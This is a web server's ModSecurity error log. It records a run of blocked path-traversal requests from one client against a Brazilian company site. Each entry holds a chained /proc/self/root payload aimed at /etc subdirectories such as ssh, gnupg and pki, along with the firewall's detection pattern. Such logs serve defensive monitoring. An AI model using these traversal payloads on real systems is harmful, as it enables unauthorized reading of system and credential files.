[Fri Mar 20 09:37:30.859034 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.243.128:44064] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ihCii7xarUs8iHZ70wAAAgk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:32.259634 2026] [:error] [pid 7235:tid 140411674785536] [client 74.7.243.128:44068] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_jPqxLDW4GITHUkT9cgAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:33.549308 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.243.128:44074] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_jTJ3M9BSuKP7CAY0JAAAAI4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:35.914328 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:44076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_j_XLqtnMIWvjpaKt4AAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:37.238047 2026] [:error] [pid 7235:tid 140411649607424] [client 74.7.243.128:44078] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_kfqxLDW4GITHUkT9eAAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:38.570957 2026] [:error] [pid 7893:tid 140411599251200] [client 74.7.243.128:44094] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_khCii7xarUs8iHZ71AAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:39.896380 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.243.128:54212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_k11pVZ5mVmJwsFNEuQAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:41.322538 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:54224] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_lda6ubjKNq_cu4btzwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:42.572137 2026] [:error] [pid 7893:tid 140411699963648] [client 74.7.243.128:54226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_lhCii7xarUs8iHZ71gAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:43.880917 2026] [:error] [pid 21219:tid 140411716749056] [client 74.7.243.128:54238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_l_XLqtnMIWvjpaKt6gAAAoM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:44.116679 2026] [:error] [pid 21219:tid 140411557287680] [client 74.7.243.128:54238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_mPXLqtnMIWvjpaKt6wAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:45.428994 2026] [:error] [pid 31215:tid 140411557287680] [client 74.7.243.128:54242] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_mQF0L0L-SsrnPo58wwAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:46.737817 2026] [:error] [pid 21219:tid 140411741927168] [client 74.7.243.128:54244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_mvXLqtnMIWvjpaKt7wAAAoA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:48.064173 2026] [:error] [pid 10189:tid 140411674785536] [client 74.7.243.128:54250] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_nDJ3M9BSuKP7CAY0LwAAAIg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:49.365245 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:54252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_nda6ubjKNq_cu4bt0wAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:49.576058 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:54252] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_nda6ubjKNq_cu4bt1AAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:50.882904 2026] [:error] [pid 7235:tid 140411666392832] [client 74.7.243.128:55784] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_nvqxLDW4GITHUkT9ewAAAQk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:52.172569 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:55798] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_oLninkcc-iUj5ApxmQAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:53.536179 2026] [:error] [pid 11167:tid 140411616036608] [client 74.7.243.128:55814] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ofHIg5MgXLBnicMLZQAAAc8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:54.867040 2026] [:error] [pid 9818:tid 140411691570944] [client 74.7.243.128:55822] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_ol1pVZ5mVmJwsFNExAAAAEY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 09:37:56.154213 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:55838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0_pNa6ubjKNq_cu4bt3QAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
